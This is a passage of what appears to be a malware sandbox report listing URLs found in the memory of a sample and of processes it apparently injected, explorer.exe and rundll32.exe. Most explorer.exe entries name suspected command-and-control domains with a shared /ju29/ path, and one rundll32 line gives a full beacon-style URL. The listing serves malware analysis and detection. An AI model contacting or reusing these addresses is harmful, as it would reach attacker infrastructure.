Source: SkypeApp.exe, 0000001C.00000003.3632977195.0000016DDDBDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant=
Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://fb.me/use-check-prop-types
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://github.com/jordanbyron/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jryans.mit-license.org/)
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://mad4milk.net/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.github.io/Win2D/html/Introduction.htm)
Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000005.00000003.2274086803.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3204464186.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1234977867.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3725032984.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077516226.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3196363751.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3719528098.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000005.00000002.3748918987.000000001197F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.3713430429.0000000004DFF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: explorer.exe, 00000005.00000000.1236699757.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.3723499643.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1235635823.0000000007C70000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://typescriptlang.org
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://underscorejs.org/
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.adjust.com
Source: SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000003.3074623162.000000000C420000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273873854.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2272431891.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3744922659.000000000C42F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1240160729.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074724370.000000000C42C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodacristianyjuani.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodacristianyjuani.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodacristianyjuani.com/ju29/www.dwijtechnology.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bodacristianyjuani.comReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.durufilmyapim.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.durufilmyapim.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.durufilmyapim.com/ju29/www.mnchentampere.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.durufilmyapim.comReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dwijtechnology.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dwijtechnology.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dwijtechnology.com/ju29/www.klxcv.xyz
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dwijtechnology.comReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.e9pf4s.top
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.e9pf4s.top/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.e9pf4s.top/ju29/www.townstart.shop
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.e9pf4s.topReferer:
Source: explorer.exe, 00000005.00000000.1234977867.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.foreca.com
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fsf.org/copyleft/gpl.html
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyi
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyi/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyi/ju29/www.sklm888.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gaming-chairs-vn-vi-2885437.fyiReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.glocraze.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.glocraze.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.glocraze.com/ju29/www.durufilmyapim.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.glocraze.comReferer:
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/codesearch/p?hl=en#dR3YEbitojA/COPYING&q=GetSystemTimeAsFileTime%20license:bsd
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jetbrains.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.klxcv.xyz
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.klxcv.xyz/ju29/
Source: rundll32.exe, 00000006.00000002.3699669578.00000000004B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3699669578.00000000004C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFms
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.klxcv.xyz/ju29/www.merchascarpamici.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.klxcv.xyz/ju29/www.xuangesmd.com
Source: explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.klxcv.xyzReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merchascarpamici.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merchascarpamici.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merchascarpamici.com/ju29/:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.merchascarpamici.comReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mnchentampere.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mnchentampere.com/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mnchentampere.com/ju29/www.bodacristianyjuani.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mnchentampere.comReferer:
Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mzfgwh.top
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mzfgwh.top/ju29/
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mzfgwh.top/ju29/www.glocraze.com
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mzfgwh.topReferer:
Source: explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sklm888.com
